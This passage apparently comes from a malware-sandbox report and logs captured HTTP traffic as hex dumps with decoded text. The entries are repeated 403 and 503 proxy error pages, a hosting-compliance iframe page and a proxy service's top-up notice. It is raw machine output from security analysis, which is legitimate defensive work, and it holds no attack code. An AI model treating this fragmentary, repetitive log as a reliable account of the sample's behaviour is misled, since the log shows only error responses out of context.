63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:15 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:15 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
